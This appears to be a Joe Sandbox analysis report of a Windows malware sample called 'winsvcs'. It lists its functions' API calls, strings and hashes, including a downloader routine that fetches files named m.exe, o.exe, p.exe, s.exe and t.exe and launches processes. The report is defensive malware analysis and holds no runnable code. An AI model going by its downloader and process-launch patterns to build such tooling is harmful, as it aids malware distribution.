TerminateProcess.KERNEL32(00000000), ref: 0042EDE4

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: d807d79a081c4084f9f33e00fbe26a34d941df4cfadf5ee3c08c5c6df0428713
Instruction ID: 23f69739ab82ab60ae37d22de6363e677c78d496a800df86a2d8b411d35bdd9f
Opcode Fuzzy Hash: d807d79a081c4084f9f33e00fbe26a34d941df4cfadf5ee3c08c5c6df0428713
Instruction Fuzzy Hash: AA21E0BC9042449FE711DF69FC496497BA0FB4A310F80107AE50997BA5E7B4A984CF8D

Function 00401294 Relevance: 65.0, APIs: 26, Strings: 11, Instructions: 220fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401371
GetFileSize.KERNEL32(000000FF,00000000), ref: 00401395
CloseHandle.KERNEL32(000000FF), ref: 004013B0

Strings

!, xrefs: 004012B4
=, xrefs: 00401332
s, xrefs: 004012DE
4@, xrefs: 0040150D
t, xrefs: 004014D3
@, xrefs: 00401347
{, xrefs: 00401339
R, xrefs: 0040129F
r, xrefs: 004012AD
a, xrefs: 004012A6
0, xrefs: 004014FF

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: File$CloseCreateHandleSize
String ID: !$0$=$@$R$a$r$s$t${$4@
API String ID: 1378416451-1478285898
Opcode ID: 1dbbe0be060ca4b6c279e6e33d22273a4b7798d521a9a355bc9f0e26829d7780
Instruction ID: 3aa843619d31d418073711cef59783edf8e6a9b44ca045ba224e396693470445
Opcode Fuzzy Hash: 1dbbe0be060ca4b6c279e6e33d22273a4b7798d521a9a355bc9f0e26829d7780
Instruction Fuzzy Hash: 02B12A31904268EEEF219B64DD09B9EBBB5BF04304F0441E6E24CBA1E1DB751E84DF69

Function 0041411E Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 454memorystringCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000FC), ref: 00414176
SetWindowLongA.USER32(?,000000FC,?), ref: 00414184
IsWindow.USER32(?), ref: 004141B7
GetCurrentProcess.KERNEL32 ref: 00414206
FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00414214
SetWindowLongA.USER32(?,000000FC,?), ref: 00414220
GetParent.USER32(?), ref: 00414263
GetClassNameA.USER32(00000000,?,00000008), ref: 00414271
lstrcmp.KERNEL32(?,0043ACB4), ref: 00414281
GetSysColor.USER32(0000000F), ref: 0041428D
GetSysColor.USER32(00000005), ref: 00414297
GetWindowLongA.USER32(?,000000F0), ref: 004143A9
GetWindowLongA.USER32(?,000000F0), ref: 004143C4
SetWindowLongA.USER32(?,000000F0,00000000), ref: 004143D5
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 004143E7
VariantInit.OLEAUT32(?), ref: 0041444B
VariantClear.OLEAUT32(?), ref: 0041445D
SysAllocString.OLEAUT32(?), ref: 00414471
VariantClear.OLEAUT32(?), ref: 004144B1
VariantClear.OLEAUT32(?), ref: 004144BC
lstrlenW.KERNEL32(?,8007000E), ref: 004145A3
GlobalAlloc.KERNEL32(00000042,-0000000E), ref: 004145B0
GlobalFix.KERNEL32(00000000), ref: 004145D1
_memcpy_s.LIBCMT ref: 004145E2
GetWindowLongA.USER32(?,000000FC), ref: 004146A8
SetWindowLongA.USER32(?,000000FC,?), ref: 004146B6

Strings

4D, xrefs: 004142AA

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: Window$Long$Variant$Clear$AllocColorGlobal$CacheClassCurrentFlushInitInstructionNameParentProcessString_memcpy_slstrcmplstrlen
String ID: 4D
API String ID: 1879328196-4064760932
Opcode ID: 8be03a5f09f7f15d92ddf33614990a82e1b2fd86bda88db0956c22b7c2213bd8
Instruction ID: d33cbc65b261bd5f71919fcd58597f20de14d50e8eab0a0e342eb175f4602f49
Opcode Fuzzy Hash: 8be03a5f09f7f15d92ddf33614990a82e1b2fd86bda88db0956c22b7c2213bd8
Instruction Fuzzy Hash: 99028C71204205AFDB10CF24D848BABBBE5BF85714F14862AF859DB2A0D778DD81CB5A

Function 00401674 Relevance: 42.4, APIs: 12, Strings: 12, Instructions: 428networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0,00000001,00000000,00000000,00000000), ref: 0040168A
InternetOpenUrlA.WININET(?,vG@,00000000,00000000,00000000,00000000), ref: 004016AB
PathFindFileNameA.SHLWAPI(?), ref: 004016C1
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 00401748
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 004017C2
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040183C
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 004018B6
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040193F
InternetCloseHandle.WININET(00000000), ref: 00401948
InternetCloseHandle.WININET(?), ref: 00401951
InternetCloseHandle.WININET(00000000), ref: 00401CC7
InternetCloseHandle.WININET(00000000), ref: 00401CD0

Strings

o.exe, xrefs: 00401C17
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0, xrefs: 00401685
o.exe, xrefs: 004018BC
s.exe, xrefs: 00401842
m.exe, xrefs: 00401A07
p.exe, xrefs: 004017C8
m.exe, xrefs: 0040174E
vG@, xrefs: 004016A5
t.exe, xrefs: 004016D4
t.exe, xrefs: 00401957
s.exe, xrefs: 00401B67
p.exe, xrefs: 00401AB7

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: Internet$HttpInfoQuery$CloseHandle$Open$FileFindNamePath
String ID: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0$m.exe$m.exe$o.exe$o.exe$p.exe$p.exe$s.exe$s.exe$t.exe$t.exe$vG@
API String ID: 37956365-2170266109
Opcode ID: d811898af9405caae475fb2c357d6a7e46e2496191ffd16bc4c9c98ebedf9716
Instruction ID: fb553488e42a15cb40c77f0b723d3c996e8af59fc795cfdcf88d4fc03e82c5ec
Opcode Fuzzy Hash: d811898af9405caae475fb2c357d6a7e46e2496191ffd16bc4c9c98ebedf9716
Instruction Fuzzy Hash: F3224974D042989FDF21CFA8C844BEDBBB1AB16314F1441EAD099B72A1D3785E89CF19

Function 00420FC0 Relevance: 31.7, APIs: 21, Instructions: 206COMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 00420FE0
GetClipBox.GDI32(00000000,?), ref: 00421001
LPtoDP.GDI32(?,?,00000002), ref: 0042101C
SelectObject.GDI32(?,00000000), ref: 00421047
DPtoLP.GDI32(?,?,00000002), ref: 00421058
SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0042106C
SetBkMode.GDI32(00000001,00000001), ref: 00421078
SelectObject.GDI32(?,?), ref: 0042108A
GetClientRect.USER32(?,?), ref: 004210AA
SetBkColor.GDI32(?,?), ref: 004210BA
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004210D9
SetBkColor.GDI32(?,?), ref: 004210E8

Part of subcall function 004212B0: GetClipBox.GDI32(?,?), ref: 004212DA
Part of subcall function 004212B0: SetBkColor.GDI32(?,00000001), ref: 0042132A
Part of subcall function 004212B0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0042135B
Part of subcall function 004212B0: SetBkColor.GDI32(?,00000000), ref: 00421367
Part of subcall function 004212B0: DrawEdge.USER32(?,?,00000008,00004009), ref: 00421385
Part of subcall function 004212B0: OffsetRect.USER32(00000010,00000003,?), ref: 004213CD

GetScrollPos.USER32(?,00000001), ref: 0042111F
OffsetRect.USER32(?,00000000,00000000), ref: 00421132
OffsetRect.USER32(?,00000000,?), ref: 004211D9
SelectObject.GDI32(?,00000000), ref: 004211F6
SetBkMode.GDI32(?,00000000), ref: 00421201
SelectObject.GDI32(?,?), ref: 0042124D
DeleteObject.GDI32(?), ref: 0042125C
DeleteDC.GDI32(?), ref: 0042127F
EndPaint.USER32(?,?), ref: 0042128E

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: Object$ColorRectSelect$Offset$ClipDeleteModePaintText$BeginClientDrawEdgeScrollWindow
String ID:
API String ID: 2062583074-0
Opcode ID: ec85c6e82aff167f2083857f057e1339e9b95314912dc071d4e8745be6dab08f
Instruction ID: 7b82af6886746e71b5745f1b2fbacf292f59da6906099b940e92044999803834
Opcode Fuzzy Hash: ec85c6e82aff167f2083857f057e1339e9b95314912dc071d4e8745be6dab08f
Instruction Fuzzy Hash: 5991C271508340EFDB218F65DD48BABBBF6FB88740F10892DFA9982260CB719854DF56

Function 00410C90 Relevance: 25.6, APIs: 17, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00410CAC
RtlEnterCriticalSection.NTDLL(0044B340), ref: 00410CBA
RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00410CD3

Part of subcall function 00423370: RtlEnterCriticalSection.NTDLL(0044B340), ref: 00423381
Part of subcall function 00423370: RegisterClipboardFormatA.USER32(0043AB60), ref: 0042338C
Part of subcall function 00423370: RegisterClipboardFormatA.USER32(0043AB70), ref: 0042339C
Part of subcall function 00423370: GetClassInfoExA.USER32(0043ACBC,00000030), ref: 004233BF
Part of subcall function 00423370: LoadCursorA.USER32(00000000,00007F00), ref: 00423402
Part of subcall function 00423370: RegisterClassExA.USER32(00000030), ref: 00423425
Part of subcall function 00423370: __recalloc.LIBCMT ref: 00423479
Part of subcall function 00423370: GetClassInfoExA.USER32(0043ACC8,00000030), ref: 004234D9

FindResourceA.KERNEL32(0044B30C,00000081,00000005), ref: 00410CEC
FindResourceA.KERNEL32(0044B30C,00000081,000000F0), ref: 00410D07
LoadResource.KERNEL32(0044B30C,00000000), ref: 00410D13
LockResource.KERNEL32(00000000), ref: 00410D1A
LoadResource.KERNEL32(0044B30C,00000000), ref: 00410D28
LockResource.KERNEL32(00000000), ref: 00410D37
DialogBoxIndirectParamA.USER32(0044B30C,00000000,?,00411A10,00000000), ref: 00410D5C
GetLastError.KERNEL32 ref: 00410D71
GlobalHandle.KERNEL32(00000000), ref: 00410D7E
GlobalFree.KERNEL32(00000000), ref: 00410D85
SetLastError.KERNEL32(00000000), ref: 00410DA3
GetLastError.KERNEL32 ref: 00410DAB
GetLastError.KERNEL32 ref: 00410DBA
RaiseException.KERNEL32(C0000005,00000001,00000000,00000000), ref: 00410DD4

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: Resource$ErrorLast$ClassCriticalLoadRegisterSection$ClipboardEnterFindFormatGlobalInfoLock$CurrentCursorDialogExceptionFreeHandleIndirectLeaveParamRaiseThread__recalloc
String ID:
API String ID: 825656904-0
Opcode ID: 98cdc27012987dc8b331fe24380fde3fdf6c86d6618c04e7bde9161e2c43ec2b
Instruction ID: f745feaec7197e157a37296f2868a76793427c604a9b77b08ca0e5f371f76add
Opcode Fuzzy Hash: 98cdc27012987dc8b331fe24380fde3fdf6c86d6618c04e7bde9161e2c43ec2b
Instruction Fuzzy Hash: A631D835241700BBD7201BB5BC8CAAB3B58EB49721B141A76FD11C2391DBF8DCC1866D

Function 00423370 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 172registryclipboardCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0044B340), ref: 00423381
RegisterClipboardFormatA.USER32(0043AB60), ref: 0042338C
RegisterClipboardFormatA.USER32(0043AB70), ref: 0042339C
GetClassInfoExA.USER32(0043ACBC,00000030), ref: 004233BF
LoadCursorA.USER32(00000000,00007F00), ref: 00423402
RegisterClassExA.USER32(00000030), ref: 00423425
__recalloc.LIBCMT ref: 00423479
GetClassInfoExA.USER32(0043ACC8,00000030), ref: 004234D9
LoadCursorA.USER32(00000000,00007F00), ref: 0042351E
RegisterClassExA.USER32(00000030), ref: 00423541
__recalloc.LIBCMT ref: 00423587
RtlLeaveCriticalSection.NTDLL(0044B340), ref: 004235C9

Strings

0, xrefs: 004234F0

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: ClassRegister$ClipboardCriticalCursorFormatInfoLoadSection__recalloc$EnterLeave
String ID: 0
API String ID: 664480883-4108050209
Opcode ID: cf02972261f026e4bcbec7c13d29e9c08f259911210233a727ece19897c21767
Instruction ID: 40b37d6fc815d34b22f1382bcbd39b080c0c3bcab1dcc9cb4347d5ed29d7557a
Opcode Fuzzy Hash: cf02972261f026e4bcbec7c13d29e9c08f259911210233a727ece19897c21767
Instruction Fuzzy Hash: 7D61AFB0A043419BD711CF16E884A1ABBF5FF95715F90452EE89483360E7B8CA85CB8E

Function 0041FE80 Relevance: 22.8, APIs: 15, Instructions: 268COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,?), ref: 0041FF6D
SelectObject.GDI32(?,?), ref: 0041FFB8
DeleteDC.GDI32(00000000), ref: 0041FFD4
InterlockedDecrement.KERNEL32(?), ref: 0041FFFA
InterlockedDecrement.KERNEL32(?), ref: 0042002D
SelectObject.GDI32(?,?), ref: 00420065
SetRectEmpty.USER32(?), ref: 00420084
DrawTextA.USER32(?,?,000000FF,?,00000424), ref: 004200B0
SelectObject.GDI32(?,00000000), ref: 004200BB
InterlockedDecrement.KERNEL32(?), ref: 004200EC
SelectObject.GDI32(?,?), ref: 00420124
SetRectEmpty.USER32(?), ref: 00420143
DrawTextA.USER32(?,?,000000FF,?,00000610), ref: 0042016F
SelectObject.GDI32(?,00000000), ref: 0042017A
InterlockedDecrement.KERNEL32(?), ref: 004201AB

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: ObjectSelect$DecrementInterlocked$DrawEmptyRectText$Delete
String ID:
API String ID: 1261204413-0
Opcode ID: 45ebfb616250f77b699904baf38d30cdf4aff1f93c6dffa9c54199414b70fd65
Instruction ID: 0d3b065532d34c83c141dc093bc01bf73ec72bfda3dbf1df21a0141086e03954
Opcode Fuzzy Hash: 45ebfb616250f77b699904baf38d30cdf4aff1f93c6dffa9c54199414b70fd65
Instruction Fuzzy Hash: 9CB19B71604304EFDB00CF64E888A6ABBF5FF88304F448A6AF9498B221D775DD55CB5A

Function 004212B0 Relevance: 21.3, APIs: 14, Instructions: 279windowCOMMON

Download Yara Rule

APIs

GetClipBox.GDI32(?,?), ref: 004212DA
SetBkColor.GDI32(?,00000001), ref: 0042132A
SetBkColor.GDI32(?,?), ref: 0042133F
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0042135B
SetBkColor.GDI32(?,00000000), ref: 00421367
DrawEdge.USER32(?,?,00000008,00004009), ref: 00421385
OffsetRect.USER32(00000010,00000003,?), ref: 004213CD
DrawFrameControl.USER32(?,00000004,00000004,?), ref: 004213F0
CopyRect.USER32(?,?), ref: 00421461
SetTextColor.GDI32(?,?), ref: 004214CC
DrawTextA.USER32(?,?,000000FF,?,00000010), ref: 0042154A
SetTextColor.GDI32(?,?), ref: 00421567
SetTextColor.GDI32(?,00000000), ref: 004215F2
DrawFocusRect.USER32(?,?), ref: 0042160D

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: Color$Text$Draw$Rect$ClipControlCopyEdgeFocusFrameOffset
String ID:
API String ID: 2048994688-0
Opcode ID: 200927e29ddfe15c49f7e4c72c99c9c384ca24b6296100b23b26864b53e959f2
Instruction ID: d2e7032c405a87bda436ebbee9352e43b21f8cfe9bd8d6afaaa75e2085407c70
Opcode Fuzzy Hash: 200927e29ddfe15c49f7e4c72c99c9c384ca24b6296100b23b26864b53e959f2
Instruction Fuzzy Hash: 8CC12775604205DFDB04CF18D884A6ABBF6FF88310F588A69F8898B3A5D770ED44CB55

Function 00404687 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 70sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 00404678
Sleep.KERNEL32(00000064), ref: 004046A3
memset.MSVCRT ref: 004046B7
_snprintf.MSVCRT ref: 004046DD
Sleep.KERNEL32(00000064), ref: 004046FA
Sleep.KERNEL32(00000064), ref: 00404721
memset.MSVCRT ref: 00404735
_snprintf.MSVCRT ref: 00404762
CreateThread.KERNEL32 ref: 00404792

Strings

%s%s, xrefs: 00404751
x, xrefs: 00404694

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: Sleep$_snprintfmemset$CreateThread
String ID: %s%s$x
API String ID: 3185671098-918306452
Opcode ID: a93d2bdf82d10181dcb0b99582e3ceae6b68c2e042649301b690d65ecbcae48f
Instruction ID: 53edad24388d98d4bc92df8c35b0c357ffc742b0aeb58214580d6d560269df2a
Opcode Fuzzy Hash: a93d2bdf82d10181dcb0b99582e3ceae6b68c2e042649301b690d65ecbcae48f
Instruction Fuzzy Hash: 3C2183B1A40298AFDB109B91ED46FD97278AB05700F4004B6F249F60C1D7B85AD4CF19

Function 0041A790 Relevance: 16.6, APIs: 11, Instructions: 142registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(00136788,?,00000000,?,00135518), ref: 0041A7D0
RegCloseKey.ADVAPI32(?), ref: 0041A7E8
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000100,00000000,00000000,00000000,0013550C), ref: 0041A83B
RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000100,00000000,00000000,00000000,0013550C), ref: 0041A881
RegCloseKey.ADVAPI32(?), ref: 0041A89E
GetModuleHandleA.KERNEL32(0043AC38), ref: 0041A8D1
GetProcAddress.KERNEL32(00000000,0043AC48), ref: 0041A8E1
RegCloseKey.ADVAPI32(?), ref: 0041A91D
RegCloseKey.ADVAPI32(?), ref: 0041A937
RegDeleteKeyA.ADVAPI32(00136788,?), ref: 0041A956
RegCloseKey.ADVAPI32(?), ref: 0041A96C

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: Close$Enum$AddressDeleteHandleModuleOpenProc
String ID:
API String ID: 2624191705-0
Opcode ID: 6a43372cc1d27a15c2e45efd9a2df907d32c4fb89c259d33e084236f886f09b6
Instruction ID: 83ba429f44283625fc5b112b12f706557ec537738ca58ebf2211737b90b5b4cc
Opcode Fuzzy Hash: 6a43372cc1d27a15c2e45efd9a2df907d32c4fb89c259d33e084236f886f09b6
Instruction Fuzzy Hash: 5C51A375A05348AFD7359F25DC44BEB77F8FB89354F00482AF98882250D7B48D94CBA6

Function 00401DA3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 91comsleepCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00401DB1
CoCreateInstance.OLE32(004051FC,00000000,00000001,004051EC,?), ref: 00401DC9
VariantInit.OLEAUT32(?), ref: 00401DE0
VariantInit.OLEAUT32(?), ref: 00401E1B
VariantInit.OLEAUT32(?), ref: 00401E32
Sleep.KERNEL32(000003E8), ref: 00401E71
CoUninitialize.OLE32 ref: 00401E8D

Strings

)4@, xrefs: 00401DED
p=Dv, xrefs: 00401DE0, 00401E1B, 00401E32

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: InitVariant$CreateInitializeInstanceSleepUninitialize
String ID: )4@$p=Dv
API String ID: 4283135408-2396073130
Opcode ID: e1bc4a2e85860f621d4fc2f96366de4be55791a67befecc08ac8998583c24772
Instruction ID: 208c781282a30cfd99823755e06e75eb4e8dd7f2476d9e837450959f1c20ea48
Opcode Fuzzy Hash: e1bc4a2e85860f621d4fc2f96366de4be55791a67befecc08ac8998583c24772
Instruction Fuzzy Hash: 4931D035900608AFDB01DFA8D949BCEBBB9EF0D320F504066E901FB2A0D7B1A9448F64

Function 004281EA Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,004423C0,0000000C,00428325,00000000,00000000), ref: 004281FC
__crt_waiting_on_module_handle.LIBCMT ref: 00428207

Part of subcall function 0042AD25: Sleep.KERNEL32(000003E8,00000000,?,0042814D,KERNEL32.DLL,?,00428199), ref: 0042AD31
Part of subcall function 0042AD25: GetModuleHandleW.KERNEL32(?,?,0042814D,KERNEL32.DLL,?,00428199), ref: 0042AD3A

__lock.LIBCMT ref: 00428262
InterlockedIncrement.KERNEL32(004491E8), ref: 0042826F
__lock.LIBCMT ref: 00428283
___addlocaleref.LIBCMT ref: 004282A1

Strings

KERNEL32.DLL, xrefs: 004281F6, 004281FB, 00428206

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: KERNEL32.DLL
API String ID: 4021795732-2576044830
Opcode ID: 87a858832e1983b6c2b45198c842f97ef5da6d3e8eb4c482d3787c8fc6c638f7
Instruction ID: 71b69992fdd27ed05a877e38898eabb59d78cf734761bb36ba796b392924f269
Opcode Fuzzy Hash: 87a858832e1983b6c2b45198c842f97ef5da6d3e8eb4c482d3787c8fc6c638f7
Instruction Fuzzy Hash: 2211D570A41B11DFE710DF36A905B5EBBF0AF04314F50556FE89992390CB789900CB6C

Function 004137D7 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000FC), ref: 00413821
SetWindowLongA.USER32(?,000000FC,?), ref: 0041382F
IsWindow.USER32(?), ref: 00413862
GetCurrentProcess.KERNEL32 ref: 004138AC
FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 004138B6
SetWindowLongA.USER32(?,000000FC,?), ref: 004138C2
GetWindowLongA.USER32(?,000000FC), ref: 0041394F
SetWindowLongA.USER32(?,000000FC,?), ref: 0041395D

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: Window$Long$CacheCurrentFlushInstructionProcess
String ID:
API String ID: 2416140278-0
Opcode ID: 9cd0c253de24d0da4a258324cbea736e14a8812de488181c82210799ed2210c6
Instruction ID: 53fdc4dda89daccb099a69e9506e87e8d6b252ccccbd8fdd27d7c1450a31b40a
Opcode Fuzzy Hash: 9cd0c253de24d0da4a258324cbea736e14a8812de488181c82210799ed2210c6
Instruction Fuzzy Hash: E451B5702047009BD7305F25DC48B67BBE5FF44715F048A2EF4AA822E1D7B4AE41C718

Function 00417549 Relevance: 10.6, APIs: 7, Instructions: 89COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 004175AD
SysStringLen.OLEAUT32 ref: 004175BA
SysStringLen.OLEAUT32 ref: 004175C7
_memcpy_s.LIBCMT ref: 004175E5

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: String$Free_memcpy_s
String ID:
API String ID: 2083054645-0
Opcode ID: 56663a8811120e9036bf697866b6e5e652b3cf7cb480ee4b7b3da6ff29d398f3
Instruction ID: 1ce8d2cbe3debae867d133ec0a61dd978d441ec293a76d53af323acb72a7b2bb
Opcode Fuzzy Hash: 56663a8811120e9036bf697866b6e5e652b3cf7cb480ee4b7b3da6ff29d398f3
Instruction Fuzzy Hash: D221F632208601AFE7105F24EC48B5BB7B9FF44724F144C2AF98493261C779DC81CB99

Function 0040206E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55sleepprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040207D
CreateProcessW.KERNEL32 ref: 004020BC
Sleep.KERNEL32(000001F4,?,?,?), ref: 004020CF
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 004020E5

Strings

open, xrefs: 004020DE
D, xrefs: 0040208E

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: CreateExecuteProcessShellSleepmemset
String ID: D$open
API String ID: 541629773-2491301029
Opcode ID: 1addacf4efe8d5a76caaec790531cad723874f5d98d5e7504146ea4ebc39d0a5
Instruction ID: 244d5e96a176da2f0eb505dfe5489d13d208d1740a25dc0715168ccfed983adf
Opcode Fuzzy Hash: 1addacf4efe8d5a76caaec790531cad723874f5d98d5e7504146ea4ebc39d0a5
Instruction Fuzzy Hash: 1D015E71784348BAEB604BE4DD0AFDA7BB8AB08B00F100022F701BE0D0D6F5A0459B6E

Function 0042B460 Relevance: 9.3, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 0042B561
__FindPESection.LIBCMT ref: 0042B57B

Memory Dump Source

